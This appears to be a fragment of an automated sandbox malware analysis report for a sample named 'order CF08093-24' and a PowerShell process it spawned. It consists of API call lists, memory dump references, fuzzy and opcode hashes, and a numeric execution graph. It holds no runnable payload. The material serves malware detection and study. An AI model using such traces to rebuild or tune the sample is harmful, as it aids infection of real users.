                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E62
                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E72
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrlen
                                                                            • String ID: C:\Users\user\Desktop
                                                                            • API String ID: 2709904686-1246513382
                                                                            • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                            • Instruction ID: b9e9e75b8ba1df67f9f167ecd7c14c3df7ff164ad8267efb590a8552da577330
                                                                            • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                            • Instruction Fuzzy Hash: 81D0A7B3400930DAC3127718EC04D9F77ACEF1634074A443AE580B7165D7785D8186EC
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBE
                                                                            • CharNextA.USER32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 190613189-0
                                                                            • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                            • Instruction ID: c3aaa261a9e4bb9915bd58c77e7651ea6c0a11e303954dac61c17192ece284d7
                                                                            • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                            • Instruction Fuzzy Hash: F7F06231105459EFDB029BA5DD00D9EBBA8EF15254B2540BAE840F7250D678DE019B69
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fsl$(fsl$4']q$4']q$4']q$4']q$4pl$4pl$x.dk$x.dk$-dk
                                                                            • API String ID: 0-549173673
                                                                            • Opcode ID: 48a37a8bda9683ed8e836f307f598e24a22f38980f47f4d8bdd286cac809e08f
                                                                            • Instruction ID: b11abce3a1b2c7a52b10786f978abcb1b5ebe7c284dea46c4d164df3edbd9071
                                                                            • Opcode Fuzzy Hash: 48a37a8bda9683ed8e836f307f598e24a22f38980f47f4d8bdd286cac809e08f
                                                                            • Instruction Fuzzy Hash: 5E9241B4B002149FDB14DB68CD91BAABBB2EB85304F1085E9D90D5B355CB72DD82CFA1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fsl$(fsl$4']q$4']q$4']q$4']q$x.dk$-dk
                                                                            • API String ID: 0-4215828846
                                                                            • Opcode ID: dd58c8985522823ec857cbd4aa684ffee4313529539074cf23aef028fdea27a8
                                                                            • Instruction ID: 1bb0b00ea62303d3b85df816595b54042d7dca7b1979e0f6ac196d34dd4694cb
                                                                            • Opcode Fuzzy Hash: dd58c8985522823ec857cbd4aa684ffee4313529539074cf23aef028fdea27a8
                                                                            • Instruction Fuzzy Hash: 3BE1C3B0B202159FCB15DB68C651BAEBFA2EF84300F15D86AD8056F355CB36EC45CB91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fsl$4']q$4']q$x.dk$-dk
                                                                            • API String ID: 0-401039236
                                                                            • Opcode ID: 92626a56643b8d5aa2a350bcb50e6e42100a2c9d7ce60a382f131013a46a41d0
                                                                            • Instruction ID: b702a3da7f549ec9460ff2223f9e11a341dbd441ccde10d89f1b57417f532072
                                                                            • Opcode Fuzzy Hash: 92626a56643b8d5aa2a350bcb50e6e42100a2c9d7ce60a382f131013a46a41d0
                                                                            • Instruction Fuzzy Hash: FBC1A0B0A202159FCB15CF58C641BAEBFB2AF84314F15D46AD8046F756CB36EC49CBA1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$x.dk$-dk
                                                                            • API String ID: 0-1872766135
                                                                            • Opcode ID: 7892771df6936050b1ca38f2988ff27f8ebbdeff7bc7eb38700011a5df99d2fe
                                                                            • Instruction ID: d8909478d7b8c8a1bbc139bb6d641b2c1eac5b8c2f9328bdb9168d5de7f74a92
                                                                            • Opcode Fuzzy Hash: 7892771df6936050b1ca38f2988ff27f8ebbdeff7bc7eb38700011a5df99d2fe
                                                                            • Instruction Fuzzy Hash: 7C3293B0B102149FDB14DB68C951BAABBB2EF84304F15C4A9D9089F395CB72ED45CFA1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fsl$4']q$4pl$x.dk
                                                                            • API String ID: 0-2610102465
                                                                            • Opcode ID: 3b2e5fa3d149150f751b5d7c2a69a7fa5aa321415212c152d01ccc0284fd2ff4
                                                                            • Instruction ID: 5c1e84058d2ba8df6409160e26ba6a99bc7d2d182851dfcc7d501494aba52e1b
                                                                            • Opcode Fuzzy Hash: 3b2e5fa3d149150f751b5d7c2a69a7fa5aa321415212c152d01ccc0284fd2ff4
                                                                            • Instruction Fuzzy Hash: CD122CB4A00215DFDB64DB24C991BEABBB2FB85304F1481E9D90D5B355CB329D82CFA1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fsl$4']q$4pl$x.dk
                                                                            • API String ID: 0-2610102465
                                                                            • Opcode ID: f4be08ffd4c20edd6b2545594c98ded2fa798d699e2fe810a79d9d7beb9a0b87
                                                                            • Instruction ID: e79185ebaa295a55a5888d49f85829de781b97955d4bd33bf0876b515fa82de3
                                                                            • Opcode Fuzzy Hash: f4be08ffd4c20edd6b2545594c98ded2fa798d699e2fe810a79d9d7beb9a0b87
                                                                            • Instruction Fuzzy Hash: F6E12BB0A00215DFDB64CB24C991BEABBB2FB85304F1485E9D90D6B355CB329D81CFA1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$x.dk$-dk
                                                                            • API String ID: 0-3850510335
                                                                            • Opcode ID: 37e2a79ff9094802d4124a5b3953962693ca8f4b5f18ebe393d424a8ce5d505b
                                                                            • Instruction ID: 4f480946b11acdf90da60baf4caadbef70a25ea2e3755da596fce538cae20e6b
                                                                            • Opcode Fuzzy Hash: 37e2a79ff9094802d4124a5b3953962693ca8f4b5f18ebe393d424a8ce5d505b
                                                                            • Instruction Fuzzy Hash: B75260B0B102159FDB14DB18C951BAABBB2FB84304F15C0A9D9099F395CB72ED85CFA1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$x.dk$-dk
                                                                            • API String ID: 0-3850510335
                                                                            • Opcode ID: 45d5ab9ae5a1a54881a991fa6365ebc02fcc6ae184c1c93b3f38904d0d1ecdb0
                                                                            • Instruction ID: 872fc1a79a412a6649881ecf81eeef43b942b2831f9d52eed9428606c5067714
                                                                            • Opcode Fuzzy Hash: 45d5ab9ae5a1a54881a991fa6365ebc02fcc6ae184c1c93b3f38904d0d1ecdb0
                                                                            • Instruction Fuzzy Hash: F9424DB4B402149FD714DB58CD91BABBBB2EB89304F1081A9D90D5B751CB72ED828FE1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$x.dk$-dk
                                                                            • API String ID: 0-3850510335
                                                                            • Opcode ID: 369c172a47234a68b24c2ab1205243adcf41a4df679c06be33b7c27567e53054
                                                                            • Instruction ID: f16958982de5bcbff407b06154bbc554a233b0743cf02a145ff969c21d5634fa
                                                                            • Opcode Fuzzy Hash: 369c172a47234a68b24c2ab1205243adcf41a4df679c06be33b7c27567e53054
                                                                            • Instruction Fuzzy Hash: 67124EB4B102149FD714DB58CD91BABBBA2EB89304F1081A9D90D5F791CB72ED428FE1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q$$]q
                                                                            • Opcode ID: 019d505b43dbf3bbe0c6c984769c1f17df1f802df2d9492cc9a48a90261b0871
                                                                            • Instruction ID: 3ec3a34b43bf477455c523f25c396e3a2b7faf7374dddc16d68848839a08446d
                                                                            • Opcode Fuzzy Hash: 019d505b43dbf3bbe0c6c984769c1f17df1f802df2d9492cc9a48a90261b0871
                                                                            • Instruction Fuzzy Hash: A951F3B1B442069FCF29CE688455AEABFB2EF85710F14C8BBD8568B351CB35C942C791
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$4']q$4']q$x.dk$-dk
                                                                            • API String ID: 0-1821401884
                                                                            • Opcode ID: c3c0635f7f4266d00cf69223a3f5d7ef555162946870bdde00d6404acd5d34c2
                                                                            • Instruction ID: 09d6e83fdddd362d76cbb3ef45f94e746990ade2cd5265c81d0425c287de211c
                                                                            • Opcode Fuzzy Hash: c3c0635f7f4266d00cf69223a3f5d7ef555162946870bdde00d6404acd5d34c2
                                                                            • Instruction Fuzzy Hash: DD123DB0A002199FDB14DF54C991BDABBB2FF85304F1085E9D9096B345CB72AE85CF91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                            • API String ID: 0-3723351465
                                                                            • Opcode ID: 02f9a3bf1b76cf10bafd90077d60ae80d2e280148e70551bd2d4cad6244b397c
                                                                            • Instruction ID: a4abfd4ec23a8596900a0259c476b2b38e88673571082f15d1f90b5b68c86bd5
                                                                            • Opcode Fuzzy Hash: 02f9a3bf1b76cf10bafd90077d60ae80d2e280148e70551bd2d4cad6244b397c
                                                                            • Instruction Fuzzy Hash: 4E3137B27043178FDF29596998501F7BFA3AFC2211B24C87BCA868B346DE36C446C352
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$4']q$4']q$$]q$$]q
                                                                            • API String ID: 0-2669322367
                                                                            • Opcode ID: 1c2bcb70f0c5a9dd8a7b86159909276c0bf3bbbfa40f5aed134ee8e0486d49ae
                                                                            • Instruction ID: 3742835ae26486cc06d936bdd5fb0a31037c00d1d961280ee9044e2b762e897a
                                                                            • Opcode Fuzzy Hash: 1c2bcb70f0c5a9dd8a7b86159909276c0bf3bbbfa40f5aed134ee8e0486d49ae
                                                                            • Instruction Fuzzy Hash: CF110A717097574FCB3A162C24202EB5FE69FC2A5073948FBC481DB366CE254C4A8397
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 84ql$84ql$tP]q$tP]q$$]q
                                                                            • API String ID: 0-3063176222
                                                                            • Opcode ID: 8f24f261181ffcb16a87f30229acb0bc3fc1e22974230bfa652441dcdfd5e41b
                                                                            • Instruction ID: 3e753cc14b12e3d879924b940b6df24280214e125790fb5643bbf94e5c051d7b
                                                                            • Opcode Fuzzy Hash: 8f24f261181ffcb16a87f30229acb0bc3fc1e22974230bfa652441dcdfd5e41b
                                                                            • Instruction Fuzzy Hash: 3161F2B2B001269FCF14DF688540AABBFE2AF85700F58C47AE8159B395CB35DD41CBA1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                            • API String ID: 0-2353078639
                                                                            • Opcode ID: 610223df604bebf07aaa74c0a8a9ce96c911543c8b38719bc916ee5d2d197972
                                                                            • Instruction ID: f8f4f2932d6035b30734100d085f23e099de390bbe7e562f706a256cdef88f28
                                                                            • Opcode Fuzzy Hash: 610223df604bebf07aaa74c0a8a9ce96c911543c8b38719bc916ee5d2d197972
                                                                            • Instruction Fuzzy Hash: 444118F1714207AFDF295A2485106FE7FA6AFC1221F14487BD9418B2A2DF36CD46C762
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                            • API String ID: 0-2353078639
                                                                            • Opcode ID: 1f2b7c1e68fc276f43d0d585cead9003777f8beb40d69d3e309c5afbce352e53
                                                                            • Instruction ID: 161cc00c6448c7f739dff8e98528767c63a038361a57731d2f7c763625bbf8d4
                                                                            • Opcode Fuzzy Hash: 1f2b7c1e68fc276f43d0d585cead9003777f8beb40d69d3e309c5afbce352e53
                                                                            • Instruction Fuzzy Hash: 19412BB1740246EBCF2B4E2C95502E6FFE6AF82221F3588B7E8458B2D6DA31C521C711
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                            • API String ID: 0-2353078639
                                                                            • Opcode ID: 45bd7de24ee17b9a870044e1c94ea06a553910718188de9205e5744329abff8a
                                                                            • Instruction ID: 4a285d8edcdcbb792d78163906d403d05f3b83b83a332d535c71e5e29d6e216e
                                                                            • Opcode Fuzzy Hash: 45bd7de24ee17b9a870044e1c94ea06a553910718188de9205e5744329abff8a
                                                                            • Instruction Fuzzy Hash: 9E3128B3B842368FCF29CAB999506F7BFD5AF82620B24487BC945C6346DA36C406C751
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q$$]q$il$il
                                                                            • API String ID: 0-3875059678
                                                                            • Opcode ID: 65167bb57b1fd00cd550d1b8becb37de6ec9666886eb137506154ee6ee9fe477
                                                                            • Instruction ID: e6891490b54da25c05718862a66071b40870d9abd26226c55e7db1f1d1ee83b0
                                                                            • Opcode Fuzzy Hash: 65167bb57b1fd00cd550d1b8becb37de6ec9666886eb137506154ee6ee9fe477
                                                                            • Instruction Fuzzy Hash: 041106B170420BABDF28592E9810BA7BFAABBC1721F29843BE84687390C971C841C750
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fsl$(fsl$(fsl$(fsl
                                                                            • API String ID: 0-2021254019
                                                                            • Opcode ID: 25dde1ff8e71c39baea2fe089a53dccbd1f2b6e59473128bf68f4d2d6be1fe52
                                                                            • Instruction ID: 4621b6de703bdf847aba780730432f2fc664150cd2b2c7577d7864873d9e0ff3
                                                                            • Opcode Fuzzy Hash: 25dde1ff8e71c39baea2fe089a53dccbd1f2b6e59473128bf68f4d2d6be1fe52
                                                                            • Instruction Fuzzy Hash: 0BC19FB4A00219DFCF14CF58C551AAABBB2FF89714F24C56AD805AB745CB32EC46CB91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fsl$(fsl$(fsl$(fsl
                                                                            • API String ID: 0-2021254019
                                                                            • Opcode ID: 6bd71a5aa87d47737d9b4585f34959c17c1ecc0f8aa353b5691053dbb5e6cde0
                                                                            • Instruction ID: 53984ec82ebb9fa2ca7ebad7a8a24e1ce0d356e1fd1e571b59cf8fca25cca961
                                                                            • Opcode Fuzzy Hash: 6bd71a5aa87d47737d9b4585f34959c17c1ecc0f8aa353b5691053dbb5e6cde0
                                                                            • Instruction Fuzzy Hash: 38718FB0A00205DFCB14CF9CC655AAEBBA6FF8A310F14956AD805AB355CB36EC45CB91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q$$]q$$]q
                                                                            • API String ID: 0-858218434
                                                                            • Opcode ID: 69f2e691f3027517900569f1a5d601d79445bf91b01dbda00ce2ba245dd27a5c
                                                                            • Instruction ID: 2a1ef5219b3eacf8c8380273221a34fcf3cac6a5213c5714c8a0dd2095193e52
                                                                            • Opcode Fuzzy Hash: 69f2e691f3027517900569f1a5d601d79445bf91b01dbda00ce2ba245dd27a5c
                                                                            • Instruction Fuzzy Hash: 75314CB12497955FCB32062C58105E66FBD9FC3220B5A48BBC841CF657D8358C4AC362
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q$$]q$$]q
                                                                            • API String ID: 0-858218434
                                                                            • Opcode ID: bd7cca87cb4ee4839d830ca67aedd4f026aa49af68eb96747242c547fc4f4f74
                                                                            • Instruction ID: cbabfdd47819a138286410ebfca95e33922459bbb2978c6de3bc7e9a425f6a15
                                                                            • Opcode Fuzzy Hash: bd7cca87cb4ee4839d830ca67aedd4f026aa49af68eb96747242c547fc4f4f74
                                                                            • Instruction Fuzzy Hash: D02137F23102066BDF385D6A8850B67BEDA9BC3B11F24C87B9949C7391DD36C8418371
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ,Ssl$,Ssl$p5ck$xSsl
                                                                            • API String ID: 0-2225154413
                                                                            • Opcode ID: d8ff0aa16cc10083012cd788385633d3c1902668c14d4b84988547b7ddaadc55
                                                                            • Instruction ID: 5905f177251b92c086fd661c097b14ca86c20805543f5a56a8a895b25ce059bf
                                                                            • Opcode Fuzzy Hash: d8ff0aa16cc10083012cd788385633d3c1902668c14d4b84988547b7ddaadc55
                                                                            • Instruction Fuzzy Hash: 352138F2B50216CBCF24C66891112EBFFD5DFC6221B14887FC44A8B745DA36E852C7A2

                                                                            Execution Graph

                                                                            Execution Coverage: 2%
                                                                            Dynamic/Decrypted Code Coverage: 0%
                                                                            Signature Coverage: 1.8%
                                                                            Total number of Nodes: 1556
                                                                            Total number of Limit Nodes: 1
                                                                            execution_graph 6954 235f4bdd 6955 235f4bec 6954->6955 6956 235f4c08 6954->6956 6955->6956 6958 235f4bf2 6955->6958 6977 235f6d60 6956->6977 6960 235f6368 _free 20 API calls 6958->6960 6962 235f4bf7 6960->6962 6961 235f4c33 6981 235f4d01 6961->6981 6963 235f62ac _abort 26 API calls 6962->6963 6965 235f4c01 6963->6965 6969 235f4c66 6971 235f6368 _free 20 API calls 6969->6971 6970 235f4c72 6972 235f4d01 38 API calls 6970->6972 6976 235f4c6b 6971->6976 6973 235f4c88 6972->6973 6975 235f571e _free 20 API calls 6973->6975 6973->6976 6974 235f571e _free 20 API calls 6974->6965 6975->6976 6976->6974 6978 235f4c0f GetModuleFileNameA 6977->6978 6979 235f6d69 6977->6979 6978->6961 6993 235f6c5f 6979->6993 6983 235f4d26 6981->6983 6985 235f4d86 6983->6985 7149 235f70eb 6983->7149 6984 235f4c50 6987 235f4e76 6984->6987 6985->6984 6986 235f70eb 38 API calls 6985->6986 6986->6985 6988 235f4e8b 6987->6988 6989 235f4c5d 6987->6989 6988->6989 6990 235f637b __dosmaperr 20 API calls 6988->6990 6989->6969 6989->6970 6991 235f4eb9 6990->6991 6992 235f571e _free 20 API calls 6991->6992 6992->6989 6994 235f5af6 _abort 38 API calls 6993->6994 6995 235f6c6c 6994->6995 6996 235f6d7e __fassign 38 API calls 6995->6996 6997 235f6c74 6996->6997 7013 235f69f3 6997->7013 7000 235f6c8b 7000->6978 7003 235f6cce 7006 235f571e _free 20 API calls 7003->7006 7006->7000 7007 235f6cc9 7008 235f6368 _free 20 API calls 7007->7008 7008->7003 7009 235f6d12 7009->7003 7037 235f68c9 7009->7037 7010 235f6ce6 7010->7009 7011 235f571e _free 20 API calls 7010->7011 7011->7009 7014 235f54a7 __fassign 38 API calls 7013->7014 7015 235f6a05 7014->7015 7016 235f6a26 7015->7016 7017 235f6a14 GetOEMCP 7015->7017 7018 235f6a3d 7016->7018 7019 235f6a2b GetACP 7016->7019 7017->7018 7018->7000 7020 235f56d0 7018->7020 7019->7018 7021 235f570e 7020->7021 7026 235f56de __dosmaperr 7020->7026 7022 235f6368 _free 20 API calls 7021->7022 7024 235f570c 
